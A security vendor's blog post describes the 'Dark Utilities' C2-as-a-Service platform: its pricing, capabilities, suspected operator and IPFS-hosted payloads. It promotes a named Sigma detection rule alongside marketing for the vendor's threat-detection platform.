Dark Utilities “C2aaS” Platform: Provides Adversaries With a Vast Array of C2 Capabilities

[post-views]
August 08, 2022 · 3 min read
Dark Utilities Platform

A C2 platform called “Dark Utilities” was released in early 2022 and is currently getting traction among adversaries. Dark Utilities, a C2-as-a-Service (C2aaS), provides an affordable (at a starting price of just EUR 9,99) way of setting up an anonymous C&C infrastructure.

The service allows for remote access, DDoS attacks, command execution, and cryptojacking. Security researchers report about 3,000 users of the service.

Detect Malware Attacks Leveraging Dark Utilities

Detect the execution of suspicious Dark Utilities activity command with a Sigma rule newly released to the Threat Detection Marketplace of the SOC Prime Platform. The detection piece is provided by our top-tier Threat Bounty developer Onur Atali:

Dark Utilities ‘C2aaS’ Platform in Malware Campaigns Detect (via cmdline)

The rule is aligned with the MITRE ATT&CK® framework v.10, addressing the Execution tactic with Command and Scripting Interpreter (T1059) as the main technique.

Deeply skilled Threat Hunters are welcome to register to the SOC Prime Platform to access the benefits of the only Threat Detection Marketplace where researchers monetize their content.

If you have not registered yet to the Platform but still would like to give our threat detection content a try, see what’s available with the Cyber Threats Search Engine. Browse through a rich collection of Sigma rules with relevant threat context and CTI and MITRE ATT&CK references now, registration-free. Hit the Explore Threat Context button to drive better detection.

While cybercrooks are searching for new means of turning up the heat, the SOC Prime’s team of content contributors works hard contributing to a vast repository of detection content, driving the time-tested Detection-as-code best practices. Verified users have access to 200K+ detection algorithms and threat hunting queries aligned with 26+ industry-leading SIEM, EDR, and XDR solutions. Press the Detect & Hunt button to access the industry-leading library of Sigma and YARA rules to comb through your security data with more efficiency and agility.

Detect & Hunt Explore Threat Context

Who Is Behind Dark Utilities?

Available evidence suggests that the mastermind behind this service is a threat actor known under the nickname Inplex-sys and most probably is located in Europe. Researchers from Cisco Talos also revealed traces of adversaries’ collaboration with the Smart Bot project.

Dark Utilities Payload Analysis

The Dark Utilities platform operators decided to make customer service their calling card. The platform users are offered an intuitive dashboard and an admin panel to execute commands on affected devices. Additionally, the service provides a variety of ways to further leverage acquired access. Upon the platform’s release in 2022, adversaries also launched Discord and Telegram communities for customer support. 

The C2aaS platform runners offer malicious payloads designed to target multiple architectures. The payloads are stored in the Interplanetary File System (IPFS) – a network for storing and sharing data in a distributed file system.

The Dark Utilities runners offer one of the best Value for Money offers for adversaries, with the rich platform’s functionality at relatively low costs. The users can target various systems, establish a C2 communications channel, and achieve persistence with little to no development skills.

SOC Prime team of professionals implements in-depth defense strategies to deliver the best results in the area of threat detection. Register on the SOC Prime Platform to augment your proactive and retrospective threat hunting and timely detect any cyber punches landing within your company’s security environment.

Table of Contents

Was this article helpful?

Like and share it with your peers.
Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Related Posts